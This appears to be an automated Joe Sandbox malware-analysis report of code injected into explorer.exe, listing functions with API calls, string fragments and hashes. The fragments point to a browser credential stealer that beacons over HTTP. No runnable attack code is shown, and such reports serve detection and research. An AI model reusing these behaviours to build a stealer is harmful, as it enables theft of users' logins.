Function 059ECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 059ECFBD

Strings

@4Cw@4Cw, xrefs: 059ECFD5, 059ECFDA, 059ECFF1
@, xrefs: 059ECF0A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: 6a0896c9bbb20ee374982f2c074a7662f7322f161733c906cc3988da41dc23be
Instruction ID: c9e226fcbe8a262cfb44220ff7b31684b62e70c769694dca433f652f44dec519
Opcode Fuzzy Hash: 6a0896c9bbb20ee374982f2c074a7662f7322f161733c906cc3988da41dc23be
Instruction Fuzzy Hash: 99418D71A00218EFCB23DFA9C844EAEBBB8FF84B11F14492AE915DB254D734D941DB61

Analysis Process: explorer.exePID: 4004, Parent PID: 6324COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.1%
Total number of Nodes:	81
Total number of Limit Nodes:	9

Executed Functions

Function 1124CF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 1124D12E
setsockopt.WS2_32 ref: 1124D830
recv.WS2_32 ref: 1124D859

Strings

GET , xrefs: 1124D318
tion, xrefs: 1124D331
dat=, xrefs: 1124D290
: cl, xrefs: 1124D338
&un=, xrefs: 1124D4F1
nnec, xrefs: 1124D32A
Co, xrefs: 1124D323
&sql, xrefs: 1124D471
&br=, xrefs: 1124D509
ose, xrefs: 1124D33F

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: c2a857de4a51c64aea06eb57b405684796a72e79a91643413f94b8f49b39eaaa
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 9252AE35618A498FDB1DEF68C4847E9B7E1FB64304F60462EC4AFC7542EE34A946CB81

Function 1124C232 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 1124C449
NtReadFile.NTDLL ref: 1124C5FE

Strings

`, xrefs: 1124C41D

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: File$CreateRead
String ID: `
API String ID: 3388366904-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: c094bdf0f777c0c5ebf4892289564cd242e7a2d940df9a6ec17cccffb3bd6c1c
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 8E225B70A18E0A9FDB4DDF2CC4956AAF7E1FB98300F60422ED55ED3650DB30A561CB85

Function 1124DE12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 1124DE67

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 76ea77645692a4077274808d88112a7308ba3b34ce43b51ea64010c112875a39
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 62015E34668B884F9788EF6C948512AB7E4FBD9215F000B3EA99AC7254EB74D5414742

Function 1124DE0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 1124DE67

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 052ff3db6039b773f40c1e0f4357861127119e421eb2eb73dc8bdbabb29df1ca
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 0701A234628B884B8788EF2C94412B6B3E5FBCE314F000B3EE99AC3240DB31D5024782

Function 112478C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 112479A0

Strings

User-Agent: , xrefs: 11247935, 11247948
urlmon.dll, xrefs: 11247959
nt: , xrefs: 1124791E
on.d, xrefs: 11247902

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 747eca920799c20c1022f129d6975313da29f6cd4a8a5b840fe1211609db504f
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 7931D135614A1D8FCB09EFA8C8847FDBBE0FB58204F50022AD45EE7240DF789645CB99

Function 112478BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 112479A0

Strings

User-Agent: , xrefs: 11247935, 11247948
urlmon.dll, xrefs: 11247959
nt: , xrefs: 1124791E
on.d, xrefs: 11247902

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: b4b40db08397cd0ce0e45f36205872922ba0b03fe7c759b849edbcf567842e8b
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 5521E635614A5D8FCB09DFA8C8447FD7BE0FF58204F50422AD45AD7240DF789645CB99

Function 11243B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 11243CCA

Strings

kern, xrefs: 11243B99
el32, xrefs: 11243BA0
.dll, xrefs: 11243BCD

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 5814c9e559f476d68d34a6cdbff55dc259300b2ea48584f916d2199e67571033
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: B8419A74918A19CFDB48EFA8C8887AD7BE0FB58300F10417AD84EDB615EE349945CB85

Function 11243B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 11243CCA

Strings

kern, xrefs: 11243B99
el32, xrefs: 11243BA0
.dll, xrefs: 11243BCD

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: b327227610ac3806ff67adce6b5a2428f2c59e96e9382f83dcf0c0b96af4b7c7
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: EC417974918A088FDB88EFA8C488BED77F0FB68300F10417AD84EDB255DE34A945CB85

Function 1124972E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 11249791

Strings

ect, xrefs: 11249761
conn, xrefs: 1124975A

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 92cad874c2eb0cfd403a4dd7d37bfeaca26d3b59bc41588bbb10cea6edbdf8e9
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 05015E74618B188FCB88EF1CE088B65B7E0FB58314F1545AED90DCB226C674D8818BC2

Function 11249732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 11249791

Strings

ect, xrefs: 11249761
conn, xrefs: 1124975A

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 7a104493f9a0f85c5dbb6af69b28f150a4536d5fd6b86e7832f32232c237c114
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: C8012170618A1C8FCB88EF5CE048B6577E0FB59314F1541AE990DCB226C674C9818BC2

Function 112496B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 11249713

Strings

send, xrefs: 112496DA

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 830776e775b54dc1eee9fe414985be58c509e6fd2d4fd9155879b50f6ee8dfbd
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: E4011270618A198FDB88DF1CD048B2577E0EB58314F1545AED85DCB266D670D8818B85

Function 112495B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 11249611

Strings

sock, xrefs: 112495D9

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 625dec33ae07eafa56293b44ff3f450a5737cf118f8ce8043d3a5d23077fc89e
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 13014470618A1C8FCB88DF1CD048B54BBE0FB59314F1545ADD45ECB266D7B0C981CB86

Function 112412DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 1124132D

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: a02954efda90a8813fb78abe475ad982b433d4a450183a9c6ad3fb0462c99f4b
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 46317C74614B4ADFDB58EF6980882A5BBA0FB55304F74427ECA2DCB906CB70A450CF91

Function 11241412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 11241461

Memory Dump Source

Source File: 00000007.00000002.4604222907.00000000111E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_111e0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: bebf80adf205d4c533523e779bd0b670a7a24e90eb38ad426dc3b6fc97383751
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 7BF0F634268E494FE788EF2CD44563AF7E0FBE8214F51063EA54DC3264DA39D5814716

Non-executed Functions

Function 11445D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

S, xrefs: 11446073
user, xrefs: 11445F03
ll, xrefs: 11445F13
M, xrefs: 11446082
el32, xrefs: 11445F27
kern, xrefs: 11445F5A
32.d, xrefs: 11445F0B
net., xrefs: 11445F44
dll, xrefs: 11445F4C
wini, xrefs: 11445F72
.dll, xrefs: 11445F2F

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 88ca7200b94d715e6c84bde7b19de332049f3712921704421b7b8bf3e0affc34
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: C0E18BB8618F488FD7A4DF28C4847AAB7E0FB68705F504A2E959FC7641DF34A501CB89

Function 112E5D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

wini, xrefs: 112E5F72
.dll, xrefs: 112E5F2F
kern, xrefs: 112E5F5A
S, xrefs: 112E6073
dll, xrefs: 112E5F4C
el32, xrefs: 112E5F27
M, xrefs: 112E6082
net., xrefs: 112E5F44
ll, xrefs: 112E5F13
user, xrefs: 112E5F03
32.d, xrefs: 112E5F0B

Memory Dump Source

Source File: 00000007.00000002.4604358866.00000000112E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_112e0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 6d8bdc214d0e842fdc5b5cf2395cb3436d4cee1f55a60ebf270a270aecb9e9cc
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 6BE15974618B488FC7A5DF68C488BAAB7E0FF58305F904A2E959FC7245DF30A541CB89

Function 11448792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

Subm, xrefs: 11448855
encr, xrefs: 114488D2
dPas, xrefs: 114488E2
guid, xrefs: 114487CE
e, xrefs: 114488BD
swor, xrefs: 114488EA
user, xrefs: 11448876
Fiel, xrefs: 11448884
form, xrefs: 1144884D
ypte, xrefs: 114488A5
dUse, xrefs: 114488AD
ypte, xrefs: 114488DA
d, xrefs: 114488F2
name, xrefs: 1144887D
itUR, xrefs: 1144885D
rnam, xrefs: 114488B5
encr, xrefs: 1144889D

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 1fad4d3555905daa1ded59336ab77401dcf8e367c1d83fd52921937ae94cdea8
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 8BB1BB74518B488EDB94EF68C485AEEB7F1FFA8704F50451ED49AC7252EF30A405CB86

Function 112E8792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

ypte, xrefs: 112E88DA
dPas, xrefs: 112E88E2
guid, xrefs: 112E87CE
swor, xrefs: 112E88EA
itUR, xrefs: 112E885D
e, xrefs: 112E88BD
dUse, xrefs: 112E88AD
Fiel, xrefs: 112E8884
encr, xrefs: 112E889D
user, xrefs: 112E8876
form, xrefs: 112E884D
rnam, xrefs: 112E88B5
Subm, xrefs: 112E8855
encr, xrefs: 112E88D2
name, xrefs: 112E887D
ypte, xrefs: 112E88A5
d, xrefs: 112E88F2

Memory Dump Source

Source File: 00000007.00000002.4604358866.00000000112E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_112e0000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 931217d03b9fba2dc54f65e7a490823ad6df0c9bddd2f4b239b75415b5ef7275
Instruction ID: 0b1123077088aa93a2b51acf3912ec10ea672a4b7327df6d739f696e7f0d6aa7
Opcode Fuzzy Hash: 931217d03b9fba2dc54f65e7a490823ad6df0c9bddd2f4b239b75415b5ef7275
Instruction Fuzzy Hash: 6AB18B30518B498EDB55EF68C489AEEB7F2FF98304F50451ED49AC7252EF70A409CB86

Function 11446622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

d, xrefs: 114466CF
d, xrefs: 1144667B
2, xrefs: 11446674
l, xrefs: 11446682
p, xrefs: 11446690
l, xrefs: 114466D6
n, xrefs: 114466BA
t, xrefs: 114466C8
l, xrefs: 114466AC
i, xrefs: 1144669E
w, xrefs: 114466B3
s, xrefs: 11446689
u, xrefs: 11446661
c, xrefs: 11446697
e, xrefs: 1144666D
d, xrefs: 114466A5
n, xrefs: 114466C1

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: daaafeca1b27b6a8bec18e02c0267196a13ffd9e3bbda4dc6d522c8d81d65ce1
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: D541BD70A18B08CFEB14DF88A4456AE7BF2FB88B04F00025ED809D3345DBB5AD458BD6

Function 112E6622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

e, xrefs: 112E666D
d, xrefs: 112E66A5
i, xrefs: 112E669E
n, xrefs: 112E66C1
c, xrefs: 112E6697
t, xrefs: 112E66C8
d, xrefs: 112E66CF
l, xrefs: 112E6682
l, xrefs: 112E66AC
p, xrefs: 112E6690
2, xrefs: 112E6674
s, xrefs: 112E6689
d, xrefs: 112E667B
u, xrefs: 112E6661
l, xrefs: 112E66D6
n, xrefs: 112E66BA
w, xrefs: 112E66B3

Memory Dump Source

Source File: 00000007.00000002.4604358866.00000000112E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_112e0000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 10b9e297ae9d724ea35c6c56cc9497fda3833fdde5ac0d3ac4cb4cc878eec043
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 4541D370A19B088FDB28DF88A4497BD7BF2FB48704F40025ED409D3245DBB5AD458BD6

Function 1144DAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 1144DC90
l, xrefs: 1144DCE2
D, xrefs: 1144DCDA
], xrefs: 1144DCA8
], xrefs: 1144DC3D
e, xrefs: 1144DCA0
[, xrefs: 1144DBF6
[, xrefs: 1144DCCD
c, xrefs: 1144DC0B
[, xrefs: 1144DC2D
[, xrefs: 1144DC66
b, xrefs: 1144DC73
l, xrefs: 1144DC35
n, xrefs: 1144DC98

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 504fa4c15d37948390b1f5855be0f3ca0f99b40892233936a44db1caa9c51986
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 97C15A78218B099FD758EF28C485AEAF7E1FBA4708F50472E949AC7250DF30B515CB86

Function 1144DF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

c, xrefs: 1144DFC8
n, xrefs: 1144DF6B
r, xrefs: 1144DFB8
r, xrefs: 1144DFA0
r, xrefs: 1144DF90
r, xrefs: 1144DF88
r, xrefs: 1144DFA8
., xrefs: 1144DF63
0, xrefs: 1144DF5B
r, xrefs: 1144DFB0
r, xrefs: 1144DFC0
r, xrefs: 1144DF98

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: ab308799f9edc779ad8cfc22d699f7a84508b1a35f1cf55ba8432dd108d0fb5b
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: CB51D47161C7488FE719CF18D4812AAB7E5FB85704F601A2EE8DBD7241DBB4A506CB82

Function 112EDF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 112EDF98
., xrefs: 112EDF63
r, xrefs: 112EDFA0
n, xrefs: 112EDF6B
0, xrefs: 112EDF5B
r, xrefs: 112EDF90
r, xrefs: 112EDFC0
r, xrefs: 112EDFA8
r, xrefs: 112EDFB0
c, xrefs: 112EDFC8
r, xrefs: 112EDFB8
r, xrefs: 112EDF88

Memory Dump Source

Source File: 00000007.00000002.4604358866.00000000112E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_112e0000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: 1f8883416e9c5ead78d0cb3bb383e7b8364341c65906db7da70a87aeba52335c
Instruction ID: d17ef7a746828b18fca0c1721d9482c2bf946ff78d6b2d2bf1b4e78acf7894d0
Opcode Fuzzy Hash: 1f8883416e9c5ead78d0cb3bb383e7b8364341c65906db7da70a87aeba52335c
Instruction Fuzzy Hash: 3551E6316197488FD709CF18D8856AAB7E5FBC5304F90192EE8CBC7241DBB4A946CB82

Function 114472F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

nspr, xrefs: 114474D4
dragon_s.dll, xrefs: 11447614
sspi, xrefs: 11447320
opera_browser.dll, xrefs: 11447629
dll, xrefs: 1144732E
l, xrefs: 114474E2
4.dl, xrefs: 114474DB
cli., xrefs: 11447327

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: ccb1cff9269720dd1eeb2469f3c1a22ce6d063d19920758b53e291d5f1fd2511
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: ABC1A074618E1A4FD798EF68C495AAAB3E1FBA4704F60432D944EC7650DF30EA02CBC5

Function 114472F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

nspr, xrefs: 114474D4
dragon_s.dll, xrefs: 11447614
sspi, xrefs: 11447320
opera_browser.dll, xrefs: 11447629
dll, xrefs: 1144732E
l, xrefs: 114474E2
4.dl, xrefs: 114474DB
cli., xrefs: 11447327

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
